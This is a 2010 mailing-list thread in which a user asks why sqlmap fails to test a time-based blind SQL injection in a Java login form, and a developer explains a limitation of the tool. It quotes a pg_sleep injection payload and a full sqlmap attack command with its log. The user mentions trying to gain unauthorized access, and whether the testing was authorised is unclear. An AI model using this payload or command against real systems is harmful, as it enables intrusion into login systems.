Thread: [sqlmap-users] Problems with time based sql inj.

From: David G. <sk...@gm...> - 2010-04-05 20:38:45

I have one site in Java which is only vulnerable to this type of technique (time-based blind SQL injection); all the others simply do not work. Theoretically speaking, I have a login form that receives two parameters from the user via the POST method, the login and the password. I've tried several ways to circumvent this form to gain unauthorized access, but I did not succeed with the SQL injection. However, Nessus reported that the field is vulnerable to time-based SQL injection by manipulating the parameter j_username with the following query:

j_username = ';%20select%20pg_sleep%20(10)--

Having tested the failure, I noticed that only a time-based blind SQL injection is possible. But even passing the parameter --time-test to sqlmap, and setting the timetest option in sqlmap.conf to true, does not make sqlmap test for time-based SQL injection.

# ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data "action=Login&j_password=&j_username=" -p j_username -v 2 --time-test --time-sec 4 --dbms postgresql

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:34:40

[17:34:40] [DEBUG] initializing the configuration
[17:34:40] [DEBUG] initializing the knowledge base
[17:34:40] [DEBUG] cleaning up configuration parameters
[17:34:40] [DEBUG] setting the HTTP timeout
[17:34:40] [DEBUG] setting the HTTP method to GET
[17:34:40] [DEBUG] creating HTTP requests opener object
[17:34:40] [DEBUG] forcing back-end DBMS to user defined value
[17:34:40] [DEBUG] parsing XML queries file
[17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as session file
[17:34:40] [INFO] testing connection to the target url
sqlmap got a 302 redirect to http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What target address do you want to use from now on? http://xxx:80/xxx/j_xxx_xxx (default) or provide another target address based also on the redirection got from the application >
[17:34:41] [WARNING] the testable parameter 'j_username' you provided is not into the Cookie
[17:34:41] [INFO] testing if the url is stable, wait a few seconds
[17:34:42] [INFO] url is stable
[17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with 0 parenthesis
[17:34:42] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:42] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:42] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:42] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:42] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 1 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 2 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 3 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3 parenthesis
[17:34:43] [WARNING] POST parameter 'j_username' is not injectable
[17:34:43] [ERROR] all parameters are not injectable

[*] shutting down at: 17:34:43

# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)

--
David Gomes Guimarães
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 08:55:14

Hi David,

On Mon, Apr 5, 2010 at 21:38, David Guimaraes <sk...@gm...> wrote:
> ...
> I've tried several ways to circumvent this form to gain unauthorized access,
> but i not get success in the handling of sql injection. However, nessus
> reported that the field is vulnerable to Time-Based Sql Injection by
> manipulating the parameter j_username with the following query:
>
> j_username = ';%20select%20pg_sleep%20(10)--
>
> Tested the failure, I noticed that you can only make a time-based blind sql
> injection. But even passing the parameter --time-test for the sqlmap, and
> setting the option in sqlmap.conf timetest to true, does not make sqlmap
> test time-based sql inj.

sqlmap first has to detect a boolean-based blind SQL injection before it can proceed to test for time-based blind SQL injection (with --time-test, yes). This is a design flaw of the tool and will be fixed in the coming months while we work on refactoring the detection engine. At the moment you can't use sqlmap to exploit this kind of SQL injection.

By the way, this is detailed in the user's manual [1].

[1] http://sqlmap.sourceforge.net/doc/README.html#ss5.5

Cheers,

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F